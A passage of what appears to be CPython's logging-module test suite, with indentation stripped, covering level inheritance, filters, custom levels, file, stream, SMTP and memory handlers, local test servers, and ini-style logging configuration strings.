from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
from test.support.logging_helper import TestHandler
import textwrap
import threading
import time
import unittest
import warnings
import weakref
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
import asyncore
import smtpd
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
self._threading_key = threading_helper.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
threading_helper.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, encoding='utf-8', delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args, encoding="utf-8")
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
@unittest.skipIf(
support.is_emscripten, "Emscripten cannot fstat unlinked files."
)
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, encoding='utf-8', delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
# The implementation relies on os.register_at_fork existing, but we test
# based on os.fork existing because that is what users and this test use.
# This helps ensure that when fork exists (the important concept) that the
# register_at_fork mechanism is also present and used.
@support.requires_fork()
def test_post_fork_child_no_deadlock(self):
"""Ensure child logging locks are not held; bpo-6721 & bpo-36533."""
class _OurHandler(logging.Handler):
def __init__(self):
super().__init__()
self.sub_handler = logging.StreamHandler(
stream=open('/dev/null', 'wt', encoding='utf-8'))
def emit(self, record):
self.sub_handler.acquire()
try:
self.sub_handler.emit(record)
finally:
self.sub_handler.release()
self.assertEqual(len(logging._handlers), 0)
refed_h = _OurHandler()
self.addCleanup(refed_h.sub_handler.stream.close)
refed_h.name = 'because we need at least one for this test'
self.assertGreater(len(logging._handlers), 0)
self.assertGreater(len(logging._at_fork_reinit_lock_weakset), 1)
test_logger = logging.getLogger('test_post_fork_child_no_deadlock')
test_logger.addHandler(refed_h)
test_logger.setLevel(logging.DEBUG)
locks_held__ready_to_fork = threading.Event()
fork_happened__release_locks_and_end_thread = threading.Event()
def lock_holder_thread_fn():
logging._acquireLock()
try:
refed_h.acquire()
try:
# Tell the main thread to do the fork.
locks_held__ready_to_fork.set()
# If the deadlock bug exists, the fork will happen
# without dealing with the locks we hold, deadlocking
# the child.
# Wait for a successful fork or an unreasonable amount of
# time before releasing our locks. To avoid a timing based
# test we'd need communication from os.fork() as to when it
# has actually happened. Given this is a regression test
# for a fixed issue, potentially less reliably detecting
# regression via timing is acceptable for simplicity.
# The test will always take at least this long. :(
fork_happened__release_locks_and_end_thread.wait(0.5)
finally:
refed_h.release()
finally:
logging._releaseLock()
lock_holder_thread = threading.Thread(
target=lock_holder_thread_fn,
name='test_post_fork_child_no_deadlock lock holder')
lock_holder_thread.start()
locks_held__ready_to_fork.wait()
pid = os.fork()
if pid == 0:
# Child process
try:
test_logger.info(r'Child process did not deadlock. \o/')
finally:
os._exit(0)
else:
# Parent process
test_logger.info(r'Parent process returned from fork. \o/')
fork_happened__release_locks_and_end_thread.set()
lock_holder_thread.join()
support.wait_process(pid, exitcode=0)
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamWithIntName(object):
level = logging.NOTSET
name = 2
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
def test_stream_setting(self):
"""
Test setting the handler's stream
"""
h = logging.StreamHandler()
stream = io.StringIO()
old = h.setStream(stream)
self.assertIs(old, sys.stderr)
actual = h.setStream(old)
self.assertIs(actual, stream)
# test that setting to existing value returns None
actual = h.setStream(old)
self.assertIsNone(actual)
def test_can_represent_stream_with_int_name(self):
h = logging.StreamHandler(StreamWithIntName())
self.assertEqual(repr(h), '<StreamHandler 2 (NOTSET)>')
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self._quit = False
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
while not self._quit:
asyncore.loop(poll_interval, map=self._map, count=1)
def stop(self):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
"""
self._quit = True
threading_helper.join_thread(self._thread)
self._thread = None
self.close()
asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self):
"""
Tell the server thread to stop, and wait for it to do so.
"""
self.shutdown()
if self._thread is not None:
threading_helper.join_thread(self._thread)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
@support.requires_working_socket()
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever
TIMEOUT = support.LONG_TIMEOUT
def test_basic(self):
sockmap = {}
server = TestSMTPServer((socket_helper.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (socket_helper.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
def test_race_between_set_target_and_flush(self):
class MockRaceConditionHandler:
def __init__(self, mem_hdlr):
self.mem_hdlr = mem_hdlr
self.threads = []
def removeTarget(self):
self.mem_hdlr.setTarget(None)
def handle(self, msg):
thread = threading.Thread(target=self.removeTarget)
self.threads.append(thread)
thread.start()
target = MockRaceConditionHandler(self.mem_hdlr)
try:
self.mem_hdlr.setTarget(target)
for _ in range(10):
time.sleep(0.005)
self.mem_logger.info("not flushed")
self.mem_logger.warning("flushed")
finally:
for thread in target.threads:
threading_helper.join_thread(thread)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = warnings_helper.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
